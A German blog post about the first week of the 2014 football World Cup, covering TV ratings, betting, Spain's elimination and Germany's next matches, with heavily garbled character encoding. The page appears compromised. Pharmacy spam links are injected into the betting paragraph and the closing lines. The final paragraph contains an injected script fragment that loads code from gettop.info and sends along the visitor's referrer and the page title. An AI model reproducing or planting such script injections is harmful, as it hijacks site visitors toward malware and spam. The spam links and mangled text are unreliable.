Willkommen auf » WM 2014 Die erste Turnierwoche
20. Jun 2014

WM 2014 Die erste Turnierwoche

Die erste Woche der FuAYball-Weltmeisterschaft 2014 in Brasilien liegt hinter uns und wir schauen mal kurz, was sich bisher so getan hat.

WA�hrend sich die Turnierstimmung in den Wochen und Tagen vor dem ErA�ffnungsspiel nur schleppend einstellen wollte, ist das Land und die Welt nach den ersten Spielen mittlerweile nun doch wieder vollends im FuAYballfieber. Die hierzulande A?bertragenden Sender fahren auch mit Spielen ohne deutsche Beteiligung regelmA�AYig Traumquoten ein (Brasilien gegen Uruguay sahen im ZDF gestern Abend bspw. fast 15 Mio. Menschen, das erste Deutschlandspiel brachte der ARD mit mehr als 26 Mio. Zuschauern einen Marktanteil von 82 Prozent ein), die Fahnen im Stadtbild mehren sich und die Themen in den AlltagsgesprA�chen kreisen fast ausschlieAYlich um KA�nig FuAYball.

Um die Spannung auch bei den vermeintlich unattraktiven Partien hochzuhalten, duelliert man sich im Familien-, Freundes- oder Kollegenkreis in Tippspielen oder legt einfach mal den ein oder anderen Euro beim Wettanbieter seiner Wahl auf den virtuellen Tresen. Eine super A?bersicht A?ber die Angebote und Quoten fA?r die unterschiedlichsten Wettformen (Live, Endergebnis, Halbzeit, Tore, Handicap u.v.m.) zu sA�mtlichen WM-Spielen findet ihr A?brigens auf cheap trimox 500 http://sports.ladbrokes.com cost of zyprexa 10mg http://sde-kalam.mes.sch.gr/?p=7658

Der amtierende Welt- und Europameister Spanien hat sich indes mit den enttA�uschenden Niederlagen gegen Chile und die Niederlande bereits aus dem Wettbewerb verabschiedet und es kA�nnten noch weitere A?berraschungen von Mannschaften aus dem Favoritenkreis bevorstehen. In Gruppe D mA?ssen England und Uruguay um den Achtelfinaleinzug zittern und auch Portugal ist mit dem 0:4 gegen Deutschland denkbar schlecht ins Turnier gestartet.

Die schA�nsten Tore des ersten Spieltags aller acht Gruppen, u.a. mit Neymar, Benzema, Messi und Robben, seht ihr im folgenden Clip…

FA?r Jogis Jungs geht es am morgigen Samstag in Fortaleza mit dem zweiten Gruppenspiel gegen Ghana weiter. Den Abschluss der Vorrunde bildet fA?r die deutsche Nationalmannschaft dann die Begegnung mit den USA am Donnerstag in Recife.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; http://www.stylecommerce.com/generic-prandin-caraco/ Cheap http://tv1.si/order-ralista-side/ http://www.sex-titan.com/non-classe/costo-de-la-pastilla-cytotec-en-venezuela/


Einen Kommentar schreiben